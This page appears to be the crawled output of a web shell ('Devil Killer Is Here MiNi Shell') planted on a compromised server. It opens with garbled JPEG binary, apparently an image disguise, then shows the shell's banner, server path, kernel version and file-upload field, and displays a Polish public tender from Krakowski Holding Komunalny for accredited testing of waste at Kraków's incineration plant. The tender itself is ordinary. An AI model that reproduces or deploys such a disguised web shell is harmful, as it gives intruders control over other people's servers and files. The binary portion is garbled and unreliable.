JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230804/0034151401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa polegająca na poborze, przygotowaniu i prowadzeniu akredytowanych badań odpadów kierowanych do termicznego przekształcenia w Zakładzie Termicznego Przekształcania Odpadów w Krakowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krakowski Holding Komunalny S. A. w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351118089</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Jana Brożka</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-347</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@khk.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://khk.krakow.pl/pl/bip/ogloszenia-i-przetargi/zamowienia-publiczne/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa polegająca na poborze, przygotowaniu i prowadzeniu akredytowanych badań odpadów kierowanych do termicznego przekształcenia w Zakładzie Termicznego Przekształcania Odpadów w Krakowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f5e0f4dd-32a4-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00341514</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f5e0f4dd-32a4-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się <br/>przy użyciu Platformy, o której mowa w pkt. 1.2 SWZ.<br/>14.2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>14.3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto <br/>podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz <br/>zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie <br/>internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>14.4. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania<br/>14.13. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy <br/>do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do <br/>komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. <br/>Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj <br/>załącznik”).<br/>W przypadku załączników, które są składane zgodnie z PZP lub rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia <br/>2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów <br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub w konkursie, mogą być opatrzone, zgodnie z wyborem Wykonawcy/Wykonawcy wspólnie ubiegającego się o udzielenie <br/>zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju <br/>podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz <br/>z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>14.14. Zamawiający zwraca uwagę, że podpis odręczny nie jest podpisem osobistym w myśl przepisów ustawy z dnia 6 sierpnia <br/>2010 r. o dowodach osobistych ( tj. Dz. U. z 2022 r., poz. 671 z późn. zm.).<br/>14.15. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta <br/>„Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy <br/>do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie <br/>tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>14.16. Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie <br/>postępowania w zakładce „Komunikacja”.<br/>14.17. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta <br/>dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>14.18. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz <br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>14.19. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą <br/>skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez <br/>formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>14.20. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem <br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>przetargi@khk.krakow.pl (nie dotyczy składania ofert).<br/>14.21. Osobami uprawnionymi do porozumiewania się z Wykonawcami są: Paweł Urbańczyk i Dawid Studencki.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">25.1. Zamawiający informuje, że:<br/>25.1.1. administratorem Pani/Pana danych osobowych jest Zamawiający.<br/>25.1.2. Kontakt do inspektora ochrony danych osobowych: iod@khk.krakow.pl, tel.: 12 269 15 05.<br/>25.1.3. Pani/Pana dane osobowe przetwarzane będą w związku z koniecznością wypełnienia obowiązku prawnego ciążącego <br/>na Zamawiającym, w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego.<br/>25.1.4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja <br/>postępowania w oparciu o art. 18 oraz art. 74 ust. 1 PZP oraz odpowiednie organy kontrolne w zakresie ich <br/>kompetencji.<br/>25.1.5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp, przez okres 4 lat od dnia zakończenia <br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Dane te mogą być przechowywane przez okres dłuższy niż wskazany, o ile wynika<br/>to z ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (t. j. Dz. U. z 2020 r., poz. 164 <br/>z późn. zm.) i przepisów wykonawczych do tej ustawy.<br/>25.1.6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem <br/>ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia <br/>publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP. <br/>25.1.7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany.<br/>25.1.8. Posiada Pani/Pan:<br/>25.1.8.1. prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>25.1.8.2. prawo do sprostowania Pani/Pana danych osobowych (Wyjaśnienie: skorzystanie z prawa do sprostowania nie <br/>może skutkować zmianą wyniku postępowania);<br/>25.1.8.3. prawo żądania od administratora ograniczenia przetwarzania danych osobowych (prawo do ograniczenia <br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze <br/>środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne <br/>względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); <br/>25.1.8.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie <br/>danych osobowych Pani/Pana dotyczących narusza przepisy.<br/>25.1.9. Nie przysługuje Pani/Panu:<br/>25.1.9.1. prawo do usunięcia danych osobowych;<br/>25.1.9.2. prawo do przenoszenia danych osobowych;<br/>25.1.9.3. prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana <br/>danych osobowych jest konieczność wypełnienia obowiązku prawnego ciążącego na Zamawiającym.<br/>25.2. Ponadto, Zamawiający informuje, iż:<br/>25.2.1. w przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby <br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych <br/>informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o <br/>udzielenie zamówienia publicznego lub konkursu;<br/>25.2.2. wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania <br/>danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">25.1. Zamawiający informuje, że:<br/>25.1.1. administratorem Pani/Pana danych osobowych jest Zamawiający.<br/>25.1.2. Kontakt do inspektora ochrony danych osobowych: iod@khk.krakow.pl, tel.: 12 269 15 05.<br/>25.1.3. Pani/Pana dane osobowe przetwarzane będą w związku z koniecznością wypełnienia obowiązku prawnego ciążącego <br/>na Zamawiającym, w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego.<br/>25.1.4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja <br/>postępowania w oparciu o art. 18 oraz art. 74 ust. 1 PZP oraz odpowiednie organy kontrolne w zakresie ich <br/>kompetencji.<br/>25.1.5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp, przez okres 4 lat od dnia zakończenia <br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Dane te mogą być przechowywane przez okres dłuższy niż wskazany, o ile wynika<br/>to z ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (t. j. Dz. U. z 2020 r., poz. 164 <br/>z późn. zm.) i przepisów wykonawczych do tej ustawy.<br/>25.1.6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem <br/>ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia <br/>publicznego; konsekwencje niepodania określonych danych wynikają z ustawy PZP. <br/>25.1.7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany.<br/>25.1.8. Posiada Pani/Pan:<br/>25.1.8.1. prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>25.1.8.2. prawo do sprostowania Pani/Pana danych osobowych (Wyjaśnienie: skorzystanie z prawa do sprostowania nie <br/>może skutkować zmianą wyniku postępowania);<br/>25.1.8.3. prawo żądania od administratora ograniczenia przetwarzania danych osobowych (prawo do ograniczenia <br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze <br/>środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne <br/>względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); <br/>25.1.8.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie <br/>danych osobowych Pani/Pana dotyczących narusza przepisy.<br/>25.1.9. Nie przysługuje Pani/Panu:<br/>25.1.9.1. prawo do usunięcia danych osobowych;<br/>25.1.9.2. prawo do przenoszenia danych osobowych;<br/>25.1.9.3. prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana <br/>danych osobowych jest konieczność wypełnienia obowiązku prawnego ciążącego na Zamawiającym.<br/>25.2. Ponadto, Zamawiający informuje, iż:<br/>25.2.1. w przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby <br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych <br/>informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o <br/>udzielenie zamówienia publicznego lub konkursu;<br/>25.2.2. wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania <br/>danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KZP-271-TP-16/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonywanie usługi polegającej na akredytowanym poborze próbek odpadów zgodnie z <br/>normą przenoszącą normę EN 15442:2011 lub jej aktualniejszym wydaniem i przygotowaniu próbek zgodnie z normą <br/>przenoszącą normę EN 15443:2011 lub jej aktualniejszym wydaniem, bądź procedurą własną opartą na wzmiankowanej <br/>normie przedmiotowej lub jej aktualniejszym wydaniu oraz prowadzeniu akredytowanych badań próbek odpadów <br/>kierowanych do termicznego przekształcenia w Zakładzie Termicznego Przekształcania Odpadów w Krakowie przy ul. Jerzego <br/>Giedroycia 23, przez okres 8 miesięcy, w obszarze regulowanym prawnie - Rozporządzenie Ministra Środowiska z dnia 8 <br/>czerwca 2016 r. w sprawie warunków technicznych kwalifikowania części energii odzyskanej z termicznego przekształcenia <br/>odpadów oraz zgodnie z normami przenoszącymi normy wyszczególnione w załączniku nr 1 do ww. rozporządzenia lub ich <br/>aktualniejszymi wydaniami, w szczególności zgodnie z normami przenoszącymi niżej wymienione normy lub ich <br/>aktualniejsze wydania:<br/>3.1.1. EN 15400:2011 Stałe paliwa wtórne - Oznaczanie wartości opałowej;<br/>3.1.2. EN 15440:2011 Stałe paliwa wtórne - Metody oznaczania zawartości biomasy.<br/>Jednocześnie, zgodnie z treścią art. 101 ust. 4 PZP Zamawiający dopuszcza rozwiązania równoważne opisywanym, a niniejsze <br/>stwierdzenie należy traktować jako dookreślenie przy powołanych w ramach opisu przedmiotu zamówienia normach <br/>wyrazów „lub równoważne”, z zastrzeżeniem, że przedmiot zamówienia, czyli świadczenie usług polegających na <br/>akredytowanym poborze próbek, ich przygotowaniu oraz badaniu muszą spełniać wymagania stawiane dla tych usług <br/>w Rozporządzeniu Ministra Środowiska z dnia 8 czerwca 2016 r. w sprawie warunków technicznych kwalifikowania części <br/>energii odzyskanej z termicznego przekształcania odpadów (Dz. U. z 2016 r., poz. 847) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79723000-8 - Usługi analizy odpadów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71900000-7 - Usługi laboratoryjne</p> <p class="mb-0">73111000-3 - Laboratoryjne usługi badawcze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zakres zamówienia podstawowego stanowią planowane częstotliwości badań (ilość prób) wskazane w formularzu <br/>ofertowym i opisie przedmiotu zamówienia. Zamawiający przewiduje możliwość skorzystania z prawa opcji <br/>w zakresie do maksymalnie 20% zwiększenia częstotliwości badań (ilość prób) wskazanych w formularzu <br/>ofertowym i opisie przedmiotu zamówienia.<br/>9.3.2. Uprawnienie do skorzystania z prawa opcji będzie związane z bieżącymi potrzebami Zamawiającego dotyczącymi <br/>konieczności zwiększenia częstotliwości badań (ilość prób) ponad ilości wskazane w formularzu ofertowym i opisie <br/>przedmiotu zamówienia. <br/>9.3.3. W celu uruchomienia opcji Zamawiający przekaże Wykonawcy, w formie pisemnej, oświadczenie, w którym wyrazi <br/>wolę skorzystania z prawa opcji oraz określi, w jakim zakresie korzysta z prawa opcji. Złożenie oświadczenia nastąpi <br/>nie później niż 14 dni przed terminem realizacji usługi objętej prawem opcji. W przypadku skorzystania z prawa <br/>opcji, Zamawiający przekaże Wykonawcy oświadczenie, o którym mowa w zdaniu pierwszym, najpóźniej 30 dni <br/>przed zakończeniem realizacji umowy obejmującej zakres podstawowy zamówienia.<br/>9.3.4. W zakresie zamówienia opcjonalnego, Wykonawca jest zobowiązany do rozpoczęcia świadczenia usługi na <br/>podstawie pisemnego oświadczenia Zamawiającego o skorzystaniu z prawa opcji. <br/>9.3.5. Korzystanie z prawa opcji przez Zamawiającego może być dokonane jednorazowo na całą wartość zamówienia <br/>opcjonalnego lub w kilku częściach. W przypadku realizacji opcji w kilku częściach, Zamawiający będzie składał <br/>Wykonawcy kolejne oświadczenia nie później niż przed momentem wyczerpania maksymalnego zakresu <br/>wynikającego z prawa opcji.<br/>9.3.6. Zamawiający zastrzega, że zamówienie objęte prawem opcji będzie realizowane na warunkach zamówienia <br/>podstawowego, zgodnie z postanowieniami umowy, SWZ oraz ofertą Wykonawcy.<br/>9.3.7. W przypadku skorzystania przez Zamawiającego z prawa opcji, Wykonawcy przysługuje wynagrodzenie za <br/>faktyczne wykonane ilości prób (badań). Wynagrodzenie Wykonawcy za realizację usługi objętej prawem opcji <br/>zostanie wyliczone na zasadach przewidzianych umową oraz na podstawie cen jednostkowych wskazanych przez <br/>Wykonawcę w ofercie, których wykaz obejmuje załącznik nr 2 do SWZ. <br/>9.3.8. Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać <br/>w ramach realizacji przedmiotu zamówienia. W przypadku nieskorzystania przez Zamawiającego z prawa opcji, <br/>Wykonawcy nie przysługują żadne roszczenia z tego tytułu. <br/>9.3.9. Skorzystanie przez Zamawiającego z prawa opcji nie wymaga sporządzenia aneksu do umowy. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span 